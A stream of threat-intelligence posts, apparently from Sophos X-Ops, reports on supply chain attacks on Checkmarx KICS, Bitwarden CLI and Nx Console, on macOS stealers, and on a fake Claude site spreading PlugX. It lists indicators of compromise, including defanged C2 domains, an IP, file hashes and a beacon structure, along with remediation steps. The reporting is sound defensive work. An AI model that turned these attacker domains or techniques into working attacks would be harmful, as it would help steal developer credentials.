| The Sophos X-Ops blog | https://news.sophos.com/en-us/category/threat-research/ |
We handed OpenClaw a penetration testing toolkit and pointed it at one of our own legacy Active Directory networks.
The result: 23 findings across 11 attack paths…
Full breakdown 👇
https://www.youtube.com/watch?v=NEculTwSj80
New from Sophos X-Ops: the Nx Console VS Code extension compromise that led to the GitHub breach drops a Python backdoor that uses the GitHub Search API itself as its C2 channel — polling commit messages hourly for RSA-signed commands hidden in plain sight.
Analysis, IOCs, recommendations and protections: https://www.sophos.com/en-us/blog/github-internal-repositories-breached
Our CTU Research team has been tracking GOLD SALEM (aka Warlock)
A ransomware group that's torn through 60+ organisations across 3 continents in 6 months!
New video out now ⬇️
Mainstream malware now regularly affects macOS users – particularly when it comes to infostealers, which regularly account for a significant portion of all the macOS detections we see in telemetry.
Tracked since at least 2023, AMOS (Atomic macOS Stealer) is particularly prolific. It accounted for almost 40% of our macOS protection updates last year (more than double any other macOS malware family) and almost 50% of recent macOS stealer reports.
Like the MacSync stealer we reported on recently, malvertising and ClickFix-style techniques are often the initial infection vector for AMOS. Many recent lures are related to AI tools, taking advantage of the increased demand for, and popularity of, these technologies.
Our Managed Detection and Response (MDR) team has produced a detailed overview of the AMOS attack chain, along with detection and prevention opportunities: https://www.sophos.com/en-us/blog/why-amos-matters-the-macos-malware-stealing-data-at-scale
🚨 Two supply chain attacks, same day, same C2. Sophos X-Ops is aware of reports of attackers hijacking Checkmarx KICS (Docker Hub, Open VSX, GitHub Actions) and the Bitwarden CLI (npm) to steal developer credentials on April 22. Evidence suggests one coordinated campaign. 🧵
Checkmarx KICS: tampered Docker images (5M+ pulls), backdoored VS Code extensions with a commit spoofed to look like it shipped in 2022, and a malicious GitHub Action release. Payload (mcpAddon.js) swept GitHub/npm tokens, cloud creds, SSH keys, Claude/MCP configs
Bitwarden CLI: @bitwarden/cli v2026.4.0 distributed for a 93-min window (17:57–19:30 ET). Preinstall hook pulled Bun + payload targeting developer creds, tokens, Cursor and Aider configs. 70K+ weekly downloads. Vault data reportedly not affected.
Novel twist on the Bitwarden side: stolen GitHub tokens were weaponized in-line to inject malicious workflows into victim repos, and the payload created public repos in victim accounts to store AES-encrypted data
Shared C2: both campaigns exfil to audit.checkmarx[.]cx (94.154.172[.]43).
This follows an incident last month where TeamPCP compromised Checkmarx GitHub Actions alongside Trivy, LiteLLM, and Telnyx in a broader supply chain attack campaign
If you pulled any affected versions: ▪️ Remove them now ▪️ Rotate GitHub/npm/cloud/SSH creds ▪️ Audit for injected workflows + new public repos in your org ▪️ Rotate secrets in any Claude/Cursor/Aider configs on affected hosts
Sophos coverage: ▪️ JS/Steal-EAP ▪️ Linux/Agnt-HZ▪️ 94.154.172[.]43 and checkmarx[.]cx blocked
Update: We've done some further digging into this, and found that the C2 server is licence[.]claude-pro[.]com (port 443 over TCP, 8080 over UDP), with the following apparent ‘beacon’ structure: {"agent_id":"agent-[id]","hostname":"","user":"","heartbeat":3}.
Interestingly, while the attack chain is very similar to PlugX, the decrypted first-stage payload appears to be a variant of DonutLoader, an in-memory loader used by a variety of threat actors. (See our Crimson Palace coverage for a notable example: https://www.sophos.com/en-us/blog/crimson-palace-new-tools-tactics-targets)
Sophos protections: ATK/DonutLdr-B, Troj/Loader-OT. As for the final stage payload, it contains an interesting string: “beagle_default_secret_key_12345!”. We’re currently investigating that payload further and will report back with any findings.
Sophos X-Ops recently investigated a report of a fake Claude website distributing malware. The malicious domain (claude-pro[.]com) downloads a file named Claude-Pro-windows-x64.zip, which when extracted results in an MSI installer file (Claude.msi).
At the end of the attack chain is a sideloaded DLL, resulting in a PlugX infection. PlugX is a well-known modular RAT, with multiple variants and a penchant for sideloading (see https://www.sophos.com/en-us/blog/border-hopping-plugx-usb-worm).
Based on a similar sample (https://www.virustotal.com/gui/file/e6d66d192a779f195426db94d2568c03a9bd0d2e8f1972aa32a0317940ae19c2), this campaign may have been ongoing since February 2026.
Most interestingly, as we noted in a recent post on macOS infostealers (https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers), threat actors are clearly adapting to the widespread interest in popular AI tools, crafting lures that imitate legitimate AI sites (often through malvertising campaigns).
What to do: Only download Claude from the legitimate site (claude.com). Be wary of following links from ads and sponsored search results. Check your system for the files mentioned above. Sophos protection: Troj/PlugxLdr-A.
More info: https://www.virustotal.com/gui/domain/claude-pro.com
Claude-Pro-windows-x64.zip (SHA1: 3de213252d98348a7d833c4956a099bfcd36b9e2)
Claude.msi (SHA1: f02a97a42b303c068ac23859599d5610bcbb4550)
Avk.dll (SHA1: 910465739b3170584150e9260bfba6a65e633f35)
This latest variant also has the ability to patch Ledger Live with malicious logic – which could lead to crypto wallets being drained of funds.
It’s important to take into account the wider context of the increased risk to macOS users. Mainstream malware now regularly affects macOS users – particularly infostealers, which regularly account for a significant portion of the macOS detections we see in telemetry.
We expect this region of the threat landscape to keep evolving, and rapidly. Read the full article here: https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers
For example: in Dec 2025, we observed a ClickFix campaign that leveraged shared ChatGPT conversations containing malicious links, leading to MacSync infections.
A more recent campaign, in February, featured an updated MacSync variant – a multistage loader-as-a-service model, using shell-based loaders, API key-gated C2 infrastructure, dynamic AppleScript payloads, and aggressive in-memory execution.
Shell-based implementations provide threat actors with greater effectiveness and evasive capabilities, compared to native MachO binaries.
